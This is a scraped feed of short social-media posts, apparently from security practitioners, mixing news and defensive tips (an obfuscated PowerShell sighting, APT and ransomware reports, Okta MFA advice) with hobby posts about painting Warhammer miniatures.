Found an interesting PowerShell script today. It's obfuscated using a somewhat novel combination of a useless while loop, character substitution, decimal encoding, and a single-byte XOR.

Couple of people asked about our API: Yes, we do have an API. Yes, it sometimes works. Yes, you may use it responsibly. Yes, the documentation is somewhat complete and accurate. Enough to make worthwhile reading, and I just updated/clarified some of the rules. See https://isc.sans.edu/api/

@GossiTheDog and you randomly have your budget modified for not reason and logs slashed to save cash lolololololz

Can I play with magnets!

@NatlSecCnslrs agreed

@ThreatHunterJax

This is a very detailed analysis on the #SharpPanda #APT group's use of the #Soul #malware framework, used to recently target Southeast Asian government entities.
#DFIR

Check Point Report: https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/

Yesterday I forgot "responsible" in responsible disclosure and called it honourable disclosure, this need to become a thing. #ResponsibleDisclosure #HonourableDisclosure

I would like to request an 8.0085% pay rise now with a further 7.175% in 6 months! 😜
For the humour impaired, please see PornHub or move on .

The IP where this domain is located is apparently 47.99.90[.]125, which DomainTools says is China Hangzhou Aliyun Computing Co Ltd -- Alibaba's network. There were no malicious detections on this domain or IP from Virustotal.

I would highly recommend Okta customers enable Number Challenge via Okta support on their accounts (similar to Number Matching in Azure MFA, see also LAPSUS$, NewGen, WorstGen, SS etc attacks). https://support.okta.com/help/s/article/Number-Challenge-for-Okta-Verify?language=en_US

Bam, lets take this up a notch!

Highlights of the past 3 weeks work. That is the total time I have been dabbling in Warhammer. Add in a couple squads of Assault Intercessors, a squad of devastated and 3 lone test cases to accompany the big shots here. Onwards to a 2000pt army of White Scars, competition, and fun.

An evening learning to play war hammer 😎

Trying to work out what sort of decision was made here ?!?

Your annual reminder that your monthly metrics will be down 10% in February because February is 10% shorter than January. Please do not contact your data team about it.

After an absolute disaster painting I decided to assemble some scenery. Easier to empty an ADHD brain when you have a hands debuff (they are doing stuff that requires no brain power)

I obviously don’t have my tweet thread any more to add to it, but somebody is doing automated destructive attacks on VMware ESXi with 2021 vulns. At the time, to their credit, VMware were very clear in customer comms that not patching could lead to ransomware. #ESXiArgs https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/

The LockBit ransomware gang claims ION Trading UK paid a ransom after the group's cyberattack on the software firm upended derivatives trading around the world (Bloomberg)

https://www.bloomberg.com/news/articles/2023-02-03/ion-removed-from-hacker-s-target-list-deadline-for-ransom-suspended
http://www.techmeme.com/230204/p3#a230204p3

Theme song for today, because I didn't properly clean out my bag after BSidesLondon.